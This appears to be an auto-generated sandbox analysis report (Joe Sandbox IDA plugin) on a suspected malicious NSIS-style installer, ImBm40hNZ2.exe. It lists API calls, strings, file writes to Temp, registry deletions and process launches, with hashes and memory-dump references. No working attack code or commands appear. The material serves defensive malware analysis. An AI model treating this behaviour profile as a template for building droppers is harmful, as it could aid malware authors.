                                                                                                                                                                                                                                                                • GetMessagePos.USER32 ref: 0040476A
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404784
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404796
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047BC
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                • String ID: f
                                                                                                                                                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                                                                                                                                                                                                                                • Instruction ID: c5a6753d0d9a08ec20861e0abf538a780563573202a5f4a853919173bafec1ff
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F015275D00218BADB01DB94DC45FFEBBBCAF55711F10412BBA10B71C0C7B865018BA5
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B5D
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(0010B165,00000064,0010B24F), ref: 00402B88
                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00402B98
                                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,?), ref: 00402BA8
                                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BBA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • verifying installer: %d%%, xrefs: 00402B92
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                • Opcode ID: 617ddd64424c569eed37efdba56663e5011ffbcc16745b9a1190651759ad78bb
                                                                                                                                                                                                                                                                • Instruction ID: 73eba29f4f71f0575b3f4d6169dd72a4e637aea185fae63b28e602e2a4acafde
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 617ddd64424c569eed37efdba56663e5011ffbcc16745b9a1190651759ad78bb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91016770A40208BBDF249F60DD09EEE3779AB00745F008039FA06F52D0D7B5A951CF99
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetWindowTextA.USER32(00000000,Pseudosymmetry Setup), ref: 00403977
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: TextWindow
                                                                                                                                                                                                                                                                • String ID: "C:\Users\user\Desktop\ImBm40hNZ2.exe"$1033$Pseudosymmetry Setup$XRS
                                                                                                                                                                                                                                                                • API String ID: 530164218-1932638560
                                                                                                                                                                                                                                                                • Opcode ID: f86f56a9df3fcc333aaaa54e7aa9f96eb508d0daa0343c47a2c4b7c3e9f4b4ae
                                                                                                                                                                                                                                                                • Instruction ID: 4a0247ebeee86d9d37c19e51f14e2d278c467c24f84ed2d5aa0d1d46c6847925
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f86f56a9df3fcc333aaaa54e7aa9f96eb508d0daa0343c47a2c4b7c3e9f4b4ae
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E11D475B006018BC730EF56DC909737BADEB89716368417FFC0167390C679AD028B98
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A5E
                                                                                                                                                                                                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9A
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402AA3
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402AC8
                                                                                                                                                                                                                                                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                • Opcode ID: 6128ad1f95e0d45aeb4fc038169a3f4e17ade998af3df8cbe34db4d02bca8b11
                                                                                                                                                                                                                                                                • Instruction ID: 4f9eb0324db645217cd312817ce5f5f90673302cc8682bf6f7f2a23cea7074e4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6128ad1f95e0d45aeb4fc038169a3f4e17ade998af3df8cbe34db4d02bca8b11
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3114C75A00008FFDF21AF90DE49EAF3B6DEB54348B104036FA05B10A0DBB49E51AF69
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?), ref: 00401CD0
                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                                                                                                                                                                                                                                                • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401D1B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                • Opcode ID: 95477192b4ddec384c0924bacadda81c6fdd173c179a066830d31e5e10276181
                                                                                                                                                                                                                                                                • Instruction ID: a37ff7ddff9b943901b48b8e13d91397296dd9e34982c61b5f8f3387a39b4807
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 95477192b4ddec384c0924bacadda81c6fdd173c179a066830d31e5e10276181
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8F012B2A05115BFE701EBA4EE89DAF77BCEB44301B108576F501F2191C7749D018B79
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00429820,00429820,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404585,000000DF,0000040F,00000400,00000000), ref: 004046F3
                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 004046FB
                                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,00429820), ref: 0040470E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                • Opcode ID: 2b51a4659b3896669eb4823acd47a2d31c81ce241aaf8c7cf193a0d5f8863a8f
                                                                                                                                                                                                                                                                • Instruction ID: 3575eb730b5e41c4f883d25dacfc3cf5faa310bf85eded31aa5be4b75c6b21fc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b51a4659b3896669eb4823acd47a2d31c81ce241aaf8c7cf193a0d5f8863a8f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97110473A001243BEB0066699C05EAF369DCBC6334F14463BFA25F61D1E9B9AD1186E9
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,756A3410,00403294), ref: 00405627
                                                                                                                                                                                                                                                                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,756A3410,00403294), ref: 00405630
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00409014), ref: 00405641
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405621
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                                                • API String ID: 2659869361-3355392842
                                                                                                                                                                                                                                                                • Opcode ID: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                                                                                                                                                                                                                                                • Instruction ID: 2867520efe4a73b412c28396778f72c18efdc293359581d751bf97dd4c525389
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59D0A962A099302AE21226158C05E8B3A28CF42351B040032F200F22A2CA3C2D428FFE
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
                                                                                                                                                                                                                                                                • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                                                                                                                                                                                                                                                • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                                                                                                                                                                                                                                                  • Part of subcall function 00405AEF: wsprintfA.USER32 ref: 00405AFC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1404258612-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000,00000000,00402DA5,00000001), ref: 00402BD8
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402BF6
                                                                                                                                                                                                                                                                • CreateDialogParamA.USER32(0000006F,00000000,00402B42,00000000), ref: 00402C13
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000005), ref: 00402C21
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00404E1F
                                                                                                                                                                                                                                                                • CallWindowProcA.USER32(?,?,?,?), ref: 00404E70
                                                                                                                                                                                                                                                                  • Part of subcall function 00403ECB: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403EDD
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000011), ref: 004024EF
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 0040250E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp\System.dll, xrefs: 004024DD, 00402502
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileWritelstrlen
                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp\System.dll
                                                                                                                                                                                                                                                                • API String ID: 427699356-3675990351
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042B028,Error launching installer), ref: 00405369
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405376
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Error launching installer, xrefs: 00405357
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                • String ID: Error launching installer
                                                                                                                                                                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,756A3410,0040355D,004033A1,?), ref: 0040359F
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(0053DC08), ref: 004035A6
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403597
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Free$GlobalLibrary
                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                                                • API String ID: 1100898210-3355392842
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C95,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ImBm40hNZ2.exe,C:\Users\user\Desktop\ImBm40hNZ2.exe,80000000,?), ref: 0040566E
                                                                                                                                                                                                                                                                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C95,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ImBm40hNZ2.exe,C:\Users\user\Desktop\ImBm40hNZ2.exe,80000000,?), ref: 0040567C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CharPrevlstrlen
                                                                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                                                                • API String ID: 2709904686-3370423016
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 1000123B: lstrcpyA.KERNEL32(00000000,?,?,?,100014DE,?,10001020,10001019,00000001), ref: 10001258
                                                                                                                                                                                                                                                                  • Part of subcall function 1000123B: GlobalFree.KERNEL32 ref: 10001269
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16992325573.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$Free$Alloclstrcpy
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 852173138-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 00405797
                                                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(004059B6,00000000), ref: 004057AF
                                                                                                                                                                                                                                                                • CharNextA.USER32(004059B6,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 004057C0
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(004059B6,?,00000000,004059B6,00000000,[Rename],00000000,00000000,00000000), ref: 004057C9
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 190613189-0

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:0%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                Signature Coverage:100%
                                                                                                                                                                                                                                                                Total number of Nodes:1
                                                                                                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                                                                                                execution_graph 59346 33942b90 LdrInitializeThunk

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 2 339434e0-339434ec LdrInitializeThunk
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 0 33942b90-33942b9c LdrInitializeThunk
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 1 33942d10-33942d1c LdrInitializeThunk
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
• Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404811
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 0040481C
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404866
                                                                                                                                                                                                                                                                • LoadBitmapA.USER32(0000006E), ref: 00404879
                                                                                                                                                                                                                                                                • SetWindowLongA.USER32(?,000000FC,00404DF0), ref: 00404892
                                                                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004048A6
                                                                                                                                                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004048B8
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001109,00000002), ref: 004048CE
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048DA
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048EC
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004048EF
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040491A
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404926
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049BB
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049E6
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049FA
                                                                                                                                                                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 00404A29
                                                                                                                                                                                                                                                                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A37
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404A48
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B45
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BAA
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BBF
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BE3
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C03
                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404C18
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00404C28
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CA1
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001102,?,?), ref: 00404D4A
